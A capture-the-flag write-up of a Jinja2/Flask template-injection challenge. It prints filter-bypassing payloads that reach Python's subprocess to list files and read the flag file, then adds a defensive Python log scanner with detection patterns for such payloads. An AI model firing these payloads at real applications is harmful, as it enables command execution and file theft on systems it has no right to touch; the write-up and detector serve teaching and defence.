Web [70 pts]
At first glance, we don’t see anything suspicious in our page or page source. Trying to access the endpoint /strategyguide.txt will return: ACCESS DENIED.
After messing around with the input, I did see that the username field is the one displaying our results. So I started experimenting with SSTI tests.
Trying this payload returns a bunch of information about the server, exposing the backend technology (Jinja2/Flask) as well as the source code for this challenge.

Step 1
We look at the endpoint /secretserverfile.py and find this:
Making it more readable in a text editor:
Step 2
We see that there are a bunch of filters for SSTI, preventing various system commands and code execution.
After looking online at multiple ways to bypass this:
Resource: Jinja2 template injection filter bypasses
Resource: SSTI Jinja2 payloads
We came up with a payload to bypass these filters and to call subprocess to see if we can get information from the file directory:
{{request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('subprocess')|attr('getoutput')('ls')}}
Step 3
Using the above payload will result in this:
Now since we can run commands, we cat the text file for strategyguide.txt, giving us our flag:
{{request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('subprocess')|attr('getoutput')('cat strategyguide.txt')}}
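
For defenders reviewing request logs from an application like this one, the payload shape used in steps 2 and 3 (a {{ }} expression that walks |attr('...') lookups to dunder attributes) stands out once the query string is percent-decoded. The Python below is an added example, not code from the challenge or this write-up; the log layout, the IP addresses and the names classify and scan are assumptions, and the log lines are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (sample data, not from the challenge server).
# The "username" parameter follows the write-up; IPs and log layout are assumed.
SAMPLE_LOG = [
    '203.0.113.5 "GET /?username=alice HTTP/1.1" 200',
    '203.0.113.5 "GET /?username=%7B%7Brequest%7D%7D HTTP/1.1" 200',
    '203.0.113.5 "GET /?username=%7B%7Brequest%7Cattr(%27application%27)'
    '%7Cattr(%27__globals__%27)%7D%7D HTTP/1.1" 200',
    '198.51.100.9 "GET /?username=__main__+fan HTTP/1.1" 200',
]

REQUEST_LINE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})$')
EXPRESSION = re.compile(r'\{\{.*?\}\}|\{%.*?%\}', re.S)  # Jinja2 delimiters
DUNDER = re.compile(r'__\w+?__')                          # e.g. __globals__
ATTR_FILTER = re.compile(r'\|\s*attr\s*\(')               # |attr('...') lookups


def classify(value):
    """Return 'exec-chain', 'probe' or None for one decoded parameter value."""
    for expr in EXPRESSION.findall(value):
        # Dunder names or attr() lookups inside an expression mean object traversal.
        if DUNDER.search(expr) or ATTR_FILTER.search(expr):
            return 'exec-chain'
    # Template delimiters alone are still worth a lower-severity alert.
    return 'probe' if EXPRESSION.search(value) else None


def scan(lines):
    """Yield (client, parameter, verdict) for every suspicious query parameter."""
    for line in lines:
        match = REQUEST_LINE.match(line)
        if not match:
            continue  # not a request line in the assumed layout
        client, target, _status = match.groups()
        # parse_qsl percent-decodes once, as the web server does.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            verdict = classify(value)
            if verdict:
                yield client, name, verdict


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A dunder name outside template delimiters (the last sample line) is deliberately not flagged, which keeps ordinary text such as file names from raising alerts.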